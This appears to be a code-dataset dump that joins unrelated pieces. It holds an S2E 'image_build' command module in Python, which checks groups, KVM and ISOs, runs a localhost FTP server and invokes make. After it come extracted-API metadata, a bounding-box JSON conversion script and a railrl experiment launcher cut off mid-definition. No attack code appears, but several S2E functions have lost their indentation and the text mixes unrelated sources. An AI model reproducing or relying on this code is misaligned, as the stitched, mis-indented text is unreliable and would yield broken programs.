AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import glob
import grp
import logging
import os
import pwd
import re
import socket
import time
from threading import Thread
import psutil
from psutil import NoSuchProcess
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import sh
from sh import ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import EnvCommand, CommandError
from s2e_env.utils import repos
from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, \
translate_image_name
logger = logging.getLogger('image_build')
def _get_user_groups(user_name):
"""
Get a list of groups for the user ``user_name``.
"""
groups = [g.gr_name for g in grp.getgrall() if user_name in g.gr_mem]
gid = pwd.getpwnam(user_name).pw_gid
groups.append(grp.getgrgid(gid).gr_name)
return groups
def _get_user_name():
"""
Get the current user.
"""
return pwd.getpwuid(os.getuid())[0]
def _user_belongs_to(group_name):
    """Return True when the current user is a member of ``group_name``."""
    return group_name in _get_user_groups(_get_user_name())
def _raise_group_error(group_name):
    """Abort with instructions on how to join ``group_name`` (re-login needed)."""
    message = (f'You must belong to the {group_name} group in order to build '
               'images. Please run the following command, then logout '
               'and login:\n\n'
               f'\tsudo usermod -a -G {group_name} $(whoami)')
    raise CommandError(message)
def _check_groups_docker():
    """Abort unless the current user may talk to the Docker daemon."""
    if _user_belongs_to('docker'):
        return
    _raise_group_error('docker')
def _check_groups_kvm():
    """KVM group membership is only needed when images are built with KVM."""
    if _user_belongs_to('libvirtd') or _user_belongs_to('kvm'):
        return
    _raise_group_error('kvm')
def _check_virtualbox():
    """
    Abort if VirtualBox is running: it conflicts with the KVM acceleration
    that S2E relies on, so its VMs must be shut down first.
    """
    message = ('S2E uses KVM to build images. VirtualBox '
               'is currently running, which is not '
               'compatible with KVM. Please close all '
               'VirtualBox VMs and try again.')
    # Processes may disappear while we iterate the snapshot, hence the
    # per-process NoSuchProcess handling (psutil issue #132).
    for process in psutil.process_iter():
        try:
            name = process.name()
        except NoSuchProcess:
            continue
        if name == 'VBoxHeadless':
            raise CommandError(message)
def _check_vmware():
    """
    Abort if VMware is running: it conflicts with the KVM acceleration
    that S2E relies on, so its VMs must be shut down first.
    """
    message = ('S2E uses KVM to build images. VMware '
               'is currently running, which is not '
               'compatible with KVM. Please close all '
               'VMware VMs and try again.')
    # Processes may disappear while we iterate the snapshot, hence the
    # per-process NoSuchProcess handling.
    for process in psutil.process_iter():
        try:
            name = process.name()
        except NoSuchProcess:
            continue
        if name == 'vmware-vmx':
            raise CommandError(message)
def _check_kvm():
    """Ensure /dev/kvm exists; libs2e needs it to communicate with QEMU."""
    kvm_device = os.path.join(os.sep, 'dev', 'kvm')
    if os.path.exists(kvm_device):
        return
    raise CommandError('KVM interface not found - check that /dev/kvm '
                       'exists. Alternatively, you can disable KVM (-n '
                       'option) or download pre-built images (-d option)')
def _check_vmlinux():
    """Verify that every /boot/vmlinu* kernel is readable (needed by guestfish)."""
    pattern = os.path.join(os.sep, 'boot', 'vmlinu*')
    try:
        for kernel in glob.glob(pattern):
            # Opening for read is the actual permission probe.
            open(kernel, 'rb').close()
    except IOError:
        raise CommandError('Make sure that the kernels in /boot are readable. '
                           'This is required for guestfish. Please run the '
                           'following command:\n\n'
                           'sudo chmod ugo+r /boot/vmlinu*') from None
# pylint: disable=no-member
def _check_cow(image_dir):
    """
    Check that the file system that stores guest images supports copy-on-write.

    Probes by creating a scratch file and cloning it with
    ``cp --reflink=always``, which only succeeds on reflink-capable file
    systems (e.g. XFS with reflink=1, BTRFS). Returns True/False; the probe
    files are always removed.
    """
    try:
        src = f'{image_dir}/.cowcheck'
        dst = f'{image_dir}/.cowcheck1'
        sh.touch(src)
        sh.cp('--reflink=always', src, dst)
        return True
    except Exception:
        warn_msg = f"""
        Copy-on-write check failed.
        The file system where images are stored ({image_dir}) does not support copy-on-write.
        It is recommended to use an XFS or BTRFS file system with copy-on-write enabled as a storage
        location for S2E images, as this can save up to 60% of disk space. The building process checkpoints
        intermediate build steps with cp --reflink=auto to make use of copy-on-write if it is available.
        How to upgrade:
        1. Create an XFS or BTRFS partition large enough to store the images that you need (~300 GB for all images).
           Make sure you use reflink=1 to enable copy-on-write when running mkfs.xfs.
        2. Create a directory for guest images on that partition (e.g., /mnt/disk1/images)
        3. Delete the "images" folder in your S2E environment
        4. Create in your S2E environment a symbolic link called "images" to the directory you created in step 2
        """
        # Strip the 8-space literal indentation before logging.
        logger.warning(re.sub(r'^ {8}', '', warn_msg, flags=re.MULTILINE))
        return False
    finally:
        sh.rm('-f', src)
        sh.rm('-f', dst)
def _raise_invalid_image(image_name):
    """Abort because ``image_name`` does not match any known image."""
    raise CommandError(
        f'Invalid image name: {image_name}. Run ``s2e image_build`` '
        'to list available images'
    )
def _get_base_image_and_app(image_name):
x = image_name.split('/')
if len(x) == 1:
return x[0], None
if len(x) == 2:
return x
raise CommandError(f'Invalid image name {image_name}')
def _has_app_image(image_names):
for name in image_names:
if '/' in name:
return True
return False
def _check_product_keys(image_descriptors, image_names):
    """
    Abort if any selected image declares a ``product_key`` field that is
    left empty, either on the image itself or on its ``os`` descriptor.
    """
    missing_keys = []
    for image_name in image_names:
        image = image_descriptors[image_name]
        # The image (app) descriptor may require its own product key.
        if 'product_key' in image:
            if not image['product_key']:
                missing_keys.append(image_name)
        # The base OS descriptor may require one too; an image can therefore
        # appear twice in missing_keys when both keys are empty.
        ios = image_descriptors[image_name].get('os', {})
        if 'product_key' in ios:
            if not ios['product_key']:
                missing_keys.append(image_name)
    if missing_keys:
        logger.error('The following images require a product key:')
        for image in missing_keys:
            logger.error(' * %s', image)
        raise CommandError('Please update images.json and/or apps.json.')
def _check_iso(templates, app_templates, iso_dir, image_names):
    """
    Ensure every ISO required by the selected images is locatable: either the
    descriptor provides a download URL, or the named file exists in iso_dir.
    """
    for image_name in image_names:
        base_image, app_name = _get_base_image_and_app(image_name)
        # Check the base image descriptor and, if present, the app descriptor.
        descriptors = [templates[base_image]]
        if app_name:
            descriptors.append(app_templates[app_name])
        for desc in descriptors:
            iso = desc.get('iso', {})
            # An ISO with a URL is downloaded automatically - nothing to check.
            if iso.get('url', ''):
                continue
            name = iso.get('name', '')
            # No ISO needed at all for this descriptor.
            if not name:
                continue
            if not iso_dir:
                raise CommandError(
                    'Please use the --iso-dir option to specify the path '
                    f'to a folder that contains {name}'
                )
            path = os.path.join(iso_dir, name)
            if not os.path.exists(path):
                raise CommandError(f'The image {image_name} requires {path}, which could not be found')
def _is_port_available(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def _start_ftp_server(image_path, port):
    """
    Start an anonymous FTP server rooted at *image_path* on a daemon thread
    and return it. Guest VMs use it to exchange files during the build.
    """
    authorizer = DummyAuthorizer()
    # Anonymous login with full read/write permissions, restricted to image_path.
    authorizer.add_anonymous(image_path, perm='elradfmwMT')
    handler = FTPHandler
    handler.authorizer = authorizer
    # 10.0.2.2 is the host's address as seen from inside QEMU's slirp network.
    handler.masquerade_address = '10.0.2.2'
    # QEMU slirp won't let the guest reconnect if timeout happens, so we disable it
    handler.timeout = None
    server = FTPServer(("127.0.0.1", port), handler)
    thread = Thread(target=_run_ftp_server, args=[server])
    thread.daemon = True
    thread.start()
    # Give the server a moment to start accepting connections.
    time.sleep(1)
    return server
def _run_ftp_server(server):
    """Blocking serve loop run on the FTP daemon thread; always closes connections."""
    try:
        server.serve_forever()
    finally:
        logger.info('FTP server terminated')
        server.close_all()
def _get_archive_rules(image_path, rule_names):
    """Map each image name to its ``<name>.tar.xz`` archive make target."""
    if _has_app_image(rule_names):
        raise CommandError('Building archives of app images is not supported yet')
    archive_rules = [os.path.join(image_path, f'{rule}.tar.xz') for rule in rule_names]
    logger.info('The following archives will be built:')
    for archive in archive_rules:
        logger.info(' * %s', archive)
    return archive_rules
def _download_images(image_path, image_names, templates):
    """Fetch prebuilt base images from the repository into *image_path*."""
    if _has_app_image(image_names):
        raise CommandError('Downloading of app images is not supported yet')
    downloader = ImageDownloader(templates)
    downloader.download_images(image_names, image_path)
    logger.info('Successfully downloaded images: %s', ', '.join(image_names))
class Command(EnvCommand):
    """
    Builds an image.

    Orchestrates the guest-image build: validates the environment (groups,
    KVM, hypervisor conflicts, product keys, ISOs), optionally downloads
    prebuilt images, starts a local FTP server for guest file exchange, and
    drives the image Makefile.
    """
    help = 'Build an image.'
    def __init__(self):
        super().__init__()
        # Build-time flags; refined from command-line options in handle().
        self._headless = True
        self._use_kvm = True
        self._num_cores = 1
        self._has_cow = False
    def add_arguments(self, parser):
        """Register image_build's command-line options."""
        super().add_arguments(parser)
        parser.add_argument('name',
                            help='The name of the image to build. If empty,'
                                 ' shows available images', nargs='*')
        parser.add_argument('-g', '--gui', action='store_true',
                            help='Display QEMU GUI during image build')
        parser.add_argument('-c', '--cores', required=False, default=2,
                            type=int,
                            help='The number of cores used when building the '
                                 'VM image. Defaults to 2')
        parser.add_argument('-x', '--clean', action='store_true',
                            help='Deletes all images and rebuild them from '
                                 'scratch')
        parser.add_argument('-a', '--archive', action='store_true',
                            help='Creates an archive for the specified image')
        parser.add_argument('-p', '--ftp-port', required=False, default=15468, type=int,
                            help='Port for the internal FTP server to receive files from guest VMs during build')
        parser.add_argument('-d', '--download', action='store_true',
                            help='Download image from the repository instead '
                                 'of building it')
        parser.add_argument('-i', '--iso-dir',
                            help='Path to folder that stores ISO files of Windows images')
        parser.add_argument('-n', '--no-kvm', action='store_true',
                            help='Disable KVM during image build')
    def handle(self, *args, **options):
        """Entry point: validate, then build/download the requested images."""
        # If DISPLAY is missing, don't use headless mode
        if options['gui']:
            self._headless = False
        # If KVM has been explicitly disabled, don't use it during the build
        if options['no_kvm']:
            self._use_kvm = False
        self._num_cores = options['cores']
        # The path could have been deleted by a previous clean
        if not os.path.exists(self.image_path()):
            os.makedirs(self.image_path())
        img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
        if options['clean']:
            self._invoke_make(img_build_dir, ['clean'])
            return
        image_names = options['name']
        templates = get_image_templates(img_build_dir)
        app_templates = get_app_templates(img_build_dir)
        images, image_groups, image_descriptors = get_all_images(templates, app_templates)
        # No image name given: list what can be built and exit.
        if not image_names:
            self._print_image_list(images, image_groups, image_descriptors)
            print('\nRun ``s2e image_build <name>`` to build an image. '
                  'Note that you must run ``s2e build`` **before** building '
                  'an image')
            return
        # Expand group names (e.g. "windows") into concrete image names.
        image_names = translate_image_name(images, image_groups, image_names)
        logger.info('The following images will be built:')
        for image in image_names:
            logger.info(' * %s', image)
        if options['download']:
            _download_images(self.image_path(), image_names, templates)
            return
        rule_names = image_names
        if options['archive']:
            rule_names = _get_archive_rules(self.image_path(), image_names)
        iso_dir = os.path.abspath(options['iso_dir']) if options['iso_dir'] else None
        # Check for optional product keys and iso directories.
        # These may or may not be required, depending on the set of images.
        _check_product_keys(image_descriptors, image_names)
        _check_iso(templates, app_templates, iso_dir, image_names)
        if self._use_kvm:
            _check_kvm()
            _check_groups_kvm()
        _check_groups_docker()
        _check_vmlinux()
        self._has_cow = _check_cow(self.image_path())
        if self._use_kvm:
            _check_virtualbox()
            _check_vmware()
        if not _is_port_available(options['ftp_port']):
            raise CommandError(f'localhost:{options["ftp_port"]} is not available. Check that the port is free or '
                               'specify a port with --ftp-port')
        # Clone kernel if needed.
        # This is necessary if the s2e env has been initialized with -b flag.
        self._clone_kernel()
        server = _start_ftp_server(self.image_path(), options['ftp_port'])
        self._invoke_make(img_build_dir, rule_names, options['ftp_port'], iso_dir)
        logger.success('Built image(s) \'%s\'', ' '.join(image_names))
        server.close_all()
    def _invoke_make(self, img_build_dir, rule_names, ftp_port=0, iso_dir=''):
        """Run the image Makefile for *rule_names* with the build environment set up."""
        env = os.environ.copy()
        env['S2E_INSTALL_ROOT'] = self.install_path()
        env['S2E_LINUX_KERNELS_ROOT'] = \
            self.source_path(CONSTANTS['repos']['images']['linux'])
        env['OUTDIR'] = self.image_path()
        env['QEMU_FTP_PORT'] = str(ftp_port)
        env['ISODIR'] = iso_dir if iso_dir else ''
        # Keep intermediate build artifacts only when COW makes that cheap.
        env['DEBUG_INTERMEDIATE_RULES'] = '1' if self._has_cow else '0'
        logger.debug('Invoking makefile with:')
        logger.debug('export S2E_INSTALL_ROOT=%s', env['S2E_INSTALL_ROOT'])
        logger.debug('export S2E_LINUX_KERNELS_ROOT=%s', env['S2E_LINUX_KERNELS_ROOT'])
        logger.debug('export OUTDIR=%s', env['OUTDIR'])
        logger.debug('export ISODIR=%s', env.get('ISODIR', ''))
        logger.debug('export DEBUG_INTERMEDIATE_RULES=%s', env.get('DEBUG_INTERMEDIATE_RULES', ''))
        if self._headless:
            logger.warning('Image creation will run in headless mode. '
                           'Use --gui to see graphic output for debugging')
        else:
            env['GRAPHICS'] = ''
        if not self._use_kvm:
            env['QEMU_KVM'] = ''
            logger.warning('Image build without KVM. This will be slow')
        try:
            make = sh.Command('make').bake(file=os.path.join(img_build_dir,
                                                         'Makefile'),
                                           directory=self.image_path(),
                                           _env=env, _fg=True)
            make_image = make.bake(j=self._num_cores, r=True, warn_undefined_variables=True)
            make_image(sorted(rule_names))
        except ErrorReturnCode as e:
            raise CommandError(e) from e
    def _clone_kernel(self):
        """Clone the S2E Linux kernels repository into the source tree if absent."""
        kernels_root = self.source_path(CONSTANTS['repos']['images']['linux'])
        if os.path.exists(kernels_root):
            logger.info('Kernel repository already exists in %s', kernels_root)
            return
        logger.info('Cloning kernels repository to %s', kernels_root)
        kernels_repo = CONSTANTS['repos']['images']['linux']
        repos.git_clone_to_source(self.env_path(), kernels_repo)
    def _print_image_list(self, images, image_groups, image_descriptors):
        """Print the buildable image groups and images, aligned in columns."""
        img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
        templates = get_image_templates(img_build_dir)
        if not templates:
            images_json_path = os.path.join(img_build_dir, 'images.json')
            raise CommandError('No images available to build. Make sure that '
                               f'{images_json_path} exists and is valid')
        # Width of the longest entry, used for column alignment below.
        def get_max_len(lst):
            ret = 0
            for item in lst:
                if len(item) > ret:
                    ret = len(item)
            return ret
        print('Available image groups:')
        max_group_len = get_max_len(image_groups)
        for group in image_groups:
            print(f' * {group:{max_group_len}} - Build {group} images')
        print('\nAvailable images:')
        max_image_len = get_max_len(images)
        for image in sorted(images):
            print(f' * {image:{max_image_len}} - {image_descriptors[image]["name"]}')
    def _print_apps_list(self):
        """Print every app image that can be built, per base image."""
        img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
        app_templates = get_app_templates(img_build_dir)
        if not app_templates:
            apps_json_path = os.path.join(img_build_dir, 'apps.json')
            raise CommandError('No apps available to build. Make sure that '
                               f'{apps_json_path} exists and is valid')
        print('Available applications:')
        for app_template, desc in sorted(app_templates.items()):
            for base_image in desc['base_images']:
                print(f' * {base_image}/{app_template} - {desc["name"]}')
| [
"logging.getLogger",
"s2e_env.utils.images.ImageDownloader",
"sh.touch",
"os.getuid",
"time.sleep",
"s2e_env.utils.images.get_image_templates",
"sh.cp",
"s2e_env.utils.images.translate_image_name",
"s2e_env.utils.images.get_app_templates",
"os.path.exists",
"pwd.getpwnam",
"sh.rm",
"s2e_env.... | [((1756, 1788), 'logging.getLogger', 'logging.getLogger', (['"""image_build"""'], {}), "('image_build')\n", (1773, 1788), False, 'import logging\n'), ((2453, 2652), 's2e_env.command.CommandError', 'CommandError', (['f"""You must belong to the {group_name} group in order to build images. Please run the following command, then logout and login:\n\n\tsudo usermod -a -G {group_name} $(whoami)"""'], {}), '(\n f"""You must belong to the {group_name} group in order to build images. Please run the following command, then logout and login:\n\n\tsudo usermod -a -G {group_name} $(whoami)"""\n )\n', (2465, 2652), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((3482, 3503), 'psutil.process_iter', 'psutil.process_iter', ([], {}), '()\n', (3501, 3503), False, 'import psutil\n'), ((4098, 4119), 'psutil.process_iter', 'psutil.process_iter', ([], {}), '()\n', (4117, 4119), False, 'import psutil\n'), ((7044, 7153), 's2e_env.command.CommandError', 'CommandError', (['f"""Invalid image name: {image_name}. Run ``s2e image_build`` to list available images"""'], {}), "(\n f'Invalid image name: {image_name}. 
Run ``s2e image_build`` to list available images'\n )\n", (7056, 7153), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((7336, 7384), 's2e_env.command.CommandError', 'CommandError', (['f"""Invalid image name {image_name}"""'], {}), "(f'Invalid image name {image_name}')\n", (7348, 7384), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((9183, 9232), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (9196, 9232), False, 'import socket\n'), ((9436, 9453), 'pyftpdlib.authorizers.DummyAuthorizer', 'DummyAuthorizer', ([], {}), '()\n', (9451, 9453), False, 'from pyftpdlib.authorizers import DummyAuthorizer\n'), ((9744, 9783), 'pyftpdlib.servers.FTPServer', 'FTPServer', (["('127.0.0.1', port)", 'handler'], {}), "(('127.0.0.1', port), handler)\n", (9753, 9783), False, 'from pyftpdlib.servers import FTPServer\n'), ((9798, 9843), 'threading.Thread', 'Thread', ([], {'target': '_run_ftp_server', 'args': '[server]'}), '(target=_run_ftp_server, args=[server])\n', (9804, 9843), False, 'from threading import Thread\n'), ((9892, 9905), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (9902, 9905), False, 'import time\n'), ((10709, 10735), 's2e_env.utils.images.ImageDownloader', 'ImageDownloader', (['templates'], {}), '(templates)\n', (10724, 10735), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((1977, 2000), 'pwd.getpwnam', 'pwd.getpwnam', (['user_name'], {}), '(user_name)\n', (1989, 2000), False, 'import pwd\n'), ((4720, 4887), 's2e_env.command.CommandError', 'CommandError', (['"""KVM interface not found - check that /dev/kvm exists. Alternatively, you can disable KVM (-n option) or download pre-built images (-d option)"""'], {}), "(\n 'KVM interface not found - check that /dev/kvm exists. 
Alternatively, you can disable KVM (-n option) or download pre-built images (-d option)'\n )\n", (4732, 4887), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((5741, 5754), 'sh.touch', 'sh.touch', (['src'], {}), '(src)\n', (5749, 5754), False, 'import sh\n'), ((5763, 5798), 'sh.cp', 'sh.cp', (['"""--reflink=always"""', 'src', 'dst'], {}), "('--reflink=always', src, dst)\n", (5768, 5798), False, 'import sh\n'), ((6952, 6968), 'sh.rm', 'sh.rm', (['"""-f"""', 'src'], {}), "('-f', src)\n", (6957, 6968), False, 'import sh\n'), ((6977, 6993), 'sh.rm', 'sh.rm', (['"""-f"""', 'dst'], {}), "('-f', dst)\n", (6982, 6993), False, 'import sh\n'), ((8162, 8221), 's2e_env.command.CommandError', 'CommandError', (['"""Please update images.json and/or apps.json."""'], {}), "('Please update images.json and/or apps.json.')\n", (8174, 8221), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((10180, 10248), 's2e_env.command.CommandError', 'CommandError', (['"""Building archives of app images is not supported yet"""'], {}), "('Building archives of app images is not supported yet')\n", (10192, 10248), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((10622, 10684), 's2e_env.command.CommandError', 'CommandError', (['"""Downloading of app images is not supported yet"""'], {}), "('Downloading of app images is not supported yet')\n", (10634, 10684), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((13545, 13579), 's2e_env.utils.images.get_image_templates', 'get_image_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (13564, 13579), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((13604, 13636), 's2e_env.utils.images.get_app_templates', 'get_app_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (13621, 13636), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, 
get_all_images, translate_image_name\n'), ((13687, 13727), 's2e_env.utils.images.get_all_images', 'get_all_images', (['templates', 'app_templates'], {}), '(templates, app_templates)\n', (13701, 13727), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((14056, 14111), 's2e_env.utils.images.translate_image_name', 'translate_image_name', (['images', 'image_groups', 'image_names'], {}), '(images, image_groups, image_names)\n', (14076, 14111), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((15882, 15899), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (15897, 15899), False, 'import os\n'), ((17701, 17729), 'os.path.exists', 'os.path.exists', (['kernels_root'], {}), '(kernels_root)\n', (17715, 17729), False, 'import os\n'), ((18203, 18237), 's2e_env.utils.images.get_image_templates', 'get_image_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (18222, 18237), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((19207, 19239), 's2e_env.utils.images.get_app_templates', 'get_app_templates', (['img_build_dir'], {}), '(img_build_dir)\n', (19224, 19239), False, 'from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, translate_image_name\n'), ((1926, 1940), 'grp.getgrall', 'grp.getgrall', ([], {}), '()\n', (1938, 1940), False, 'import grp\n'), ((2026, 2043), 'grp.getgrgid', 'grp.getgrgid', (['gid'], {}), '(gid)\n', (2038, 2043), False, 'import grp\n'), ((2162, 2173), 'os.getuid', 'os.getuid', ([], {}), '()\n', (2171, 2173), False, 'import os\n'), ((4669, 4703), 'os.path.join', 'os.path.join', (['os.sep', '"""dev"""', '"""kvm"""'], {}), "(os.sep, 'dev', 'kvm')\n", (4681, 4703), False, 'import os\n'), ((5097, 5136), 'os.path.join', 
'os.path.join', (['os.sep', '"""boot"""', '"""vmlinu*"""'], {}), "(os.sep, 'boot', 'vmlinu*')\n", (5109, 5136), False, 'import os\n'), ((5226, 5403), 's2e_env.command.CommandError', 'CommandError', (['"""Make sure that the kernels in /boot are readable. This is required for guestfish. Please run the following command:\n\nsudo chmod ugo+r /boot/vmlinu*"""'], {}), '(\n """Make sure that the kernels in /boot are readable. This is required for guestfish. Please run the following command:\n\nsudo chmod ugo+r /boot/vmlinu*"""\n )\n', (5238, 5403), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((8970, 8997), 'os.path.join', 'os.path.join', (['iso_dir', 'name'], {}), '(iso_dir, name)\n', (8982, 8997), False, 'import os\n'), ((10327, 10366), 'os.path.join', 'os.path.join', (['image_path', 'f"""{r}.tar.xz"""'], {}), "(image_path, f'{r}.tar.xz')\n", (10339, 10366), False, 'import os\n'), ((14530, 14565), 'os.path.abspath', 'os.path.abspath', (["options['iso_dir']"], {}), "(options['iso_dir'])\n", (14545, 14565), False, 'import os\n'), ((15223, 15361), 's2e_env.command.CommandError', 'CommandError', (['f"""localhost:{options[\'ftp_port\']} is not available. Check that the port is free or specify a port with --ftp-port"""'], {}), '(\n f"localhost:{options[\'ftp_port\']} is not available. Check that the port is free or specify a port with --ftp-port"\n )\n', (15235, 15361), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((18295, 18337), 'os.path.join', 'os.path.join', (['img_build_dir', '"""images.json"""'], {}), "(img_build_dir, 'images.json')\n", (18307, 18337), False, 'import os\n'), ((18356, 18466), 's2e_env.command.CommandError', 'CommandError', (['f"""No images available to build. Make sure that {images_json_path} exists and is valid"""'], {}), "(\n f'No images available to build. 
Make sure that {images_json_path} exists and is valid'\n )\n", (18368, 18466), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((19299, 19339), 'os.path.join', 'os.path.join', (['img_build_dir', '"""apps.json"""'], {}), "(img_build_dir, 'apps.json')\n", (19311, 19339), False, 'import os\n'), ((19358, 19464), 's2e_env.command.CommandError', 'CommandError', (['f"""No apps available to build. Make sure that {apps_json_path} exists and is valid"""'], {}), "(\n f'No apps available to build. Make sure that {apps_json_path} exists and is valid'\n )\n", (19370, 19464), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((3586, 3755), 's2e_env.command.CommandError', 'CommandError', (['"""S2E uses KVM to build images. VirtualBox is currently running, which is not compatible with KVM. Please close all VirtualBox VMs and try again."""'], {}), "(\n 'S2E uses KVM to build images. VirtualBox is currently running, which is not compatible with KVM. Please close all VirtualBox VMs and try again.'\n )\n", (3598, 3755), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((4200, 4361), 's2e_env.command.CommandError', 'CommandError', (['"""S2E uses KVM to build images. VMware is currently running, which is not compatible with KVM. Please close all VMware VMs and try again."""'], {}), "(\n 'S2E uses KVM to build images. VMware is currently running, which is not compatible with KVM. 
Please close all VMware VMs and try again.'\n )\n", (4212, 4361), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((6858, 6907), 're.sub', 're.sub', (['"""^ {8}"""', '""""""', 'warn_msg'], {'flags': 're.MULTILINE'}), "('^ {8}', '', warn_msg, flags=re.MULTILINE)\n", (6864, 6907), False, 'import re\n'), ((8787, 8898), 's2e_env.command.CommandError', 'CommandError', (['f"""Please use the --iso-dir option to specify the path to a folder that contains {name}"""'], {}), "(\n f'Please use the --iso-dir option to specify the path to a folder that contains {name}'\n )\n", (8799, 8898), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((9017, 9037), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (9031, 9037), False, 'import os\n'), ((9061, 9147), 's2e_env.command.CommandError', 'CommandError', (['f"""The image {image_name} requires {path}, which could not be found"""'], {}), "(\n f'The image {image_name} requires {path}, which could not be found')\n", (9073, 9147), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((17558, 17573), 's2e_env.command.CommandError', 'CommandError', (['e'], {}), '(e)\n', (17570, 17573), False, 'from s2e_env.command import EnvCommand, CommandError\n'), ((17100, 17118), 'sh.Command', 'sh.Command', (['"""make"""'], {}), "('make')\n", (17110, 17118), False, 'import sh\n'), ((17129, 17168), 'os.path.join', 'os.path.join', (['img_build_dir', '"""Makefile"""'], {}), "(img_build_dir, 'Makefile')\n", (17141, 17168), False, 'import os\n')] |
import json
from PIL import Image
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.7.json') as f:
val_1_7 = json.load(f)
with open('sl4_side_val_1.7/results.json') as f:
new_1_8 = json.load(f)
ROOT = '/home/tianpei.qian/workspace/data_local/sl4_front_1.0/'
for old, new in zip(val_1_7, new_1_8):
assert old['file'] == new['file']
im = Image.open(ROOT + old['file'])
im_width, im_height = im.size
for box in new['detections']:
new_box = {}
x_min, x_max, y_min, y_max = box['x_min'], box['x_max'], box['y_min'], box['y_max']
width, height = x_max - x_min, y_max - y_min
new_box['coord'] = [(x_min + x_max) / 2 / im_width, (y_min + y_max) / 2 / im_height, width / im_width, height / im_height]
new_box['meta'] = {'isfrontcar': False}
new_box['class'] = box['kind']
new_box['occluded'] = 'none'
new_box['score'] = box['score']
old['boxes'].append(new_box)
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.8.json', 'w') as f:
json.dump(val_1_7, f) | [
"json.load",
"PIL.Image.open",
"json.dump"
] | [((144, 156), 'json.load', 'json.load', (['f'], {}), '(f)\n', (153, 156), False, 'import json\n'), ((221, 233), 'json.load', 'json.load', (['f'], {}), '(f)\n', (230, 233), False, 'import json\n'), ((386, 416), 'PIL.Image.open', 'Image.open', (["(ROOT + old['file'])"], {}), "(ROOT + old['file'])\n", (396, 416), False, 'from PIL import Image\n'), ((1090, 1111), 'json.dump', 'json.dump', (['val_1_7', 'f'], {}), '(val_1_7, f)\n', (1099, 1111), False, 'import json\n')] |
"""
Generate data for ablation analysis for ICML 2017 workshop paper.
"""
import random
from torch.nn import functional as F
from railrl.envs.pygame.water_maze import (
WaterMazeMemory,
)
from railrl.exploration_strategies.ou_strategy import OUStrategy
from railrl.launchers.launcher_util import (
run_experiment,
)
from railrl.launchers.memory_bptt_launchers import bptt_ddpg_launcher
from railrl.pythonplusplus import identity
from railrl.memory_states.qfunctions import MemoryQFunction
from railrl.torch.rnn import GRUCell
if __name__ == '__main__':
n_seeds = 1
mode = "here"
exp_prefix = "dev-generate-bellman-ablation-figure-data"
run_mode = 'none'
n_seeds = 5
mode = "ec2"
exp_prefix = "generate-bellman_ablation-figure-data"
use_gpu = True
if mode != "here":
use_gpu = False
H = 25
subtraj_length = None
num_steps_per_iteration = 1000
num_steps_per_eval = 1000
num_iterations = 100
batch_size = 100
memory_dim = 100
version = "Our Method"
# noinspection PyTypeChecker
variant = dict(
memory_dim=memory_dim,
env_class=WaterMazeMemory,
env_params=dict(
horizon=H,
give_time=True,
),
memory_aug_params=dict(
max_magnitude=1,
),
algo_params=dict(
subtraj_length=subtraj_length,
batch_size=batch_size,
num_epochs=num_iterations,
num_steps_per_epoch=num_steps_per_iteration,
num_steps_per_eval=num_steps_per_eval,
discount=0.9,
use_action_policy_params_for_entire_policy=False,
action_policy_optimize_bellman=False,
write_policy_optimizes='bellman',
action_policy_learning_rate=0.001,
write_policy_learning_rate=0.0005,
qf_learning_rate=0.002,
max_path_length=H,
refresh_entire_buffer_period=None,
save_new_memories_back_to_replay_buffer=True,
write_policy_weight_decay=0,
action_policy_weight_decay=0,
do_not_load_initial_memories=False,
save_memory_gradients=False,
),
qf_class=MemoryQFunction,
qf_params=dict(
output_activation=identity,
fc1_size=400,
fc2_size=300,
ignore_memory=False,
),
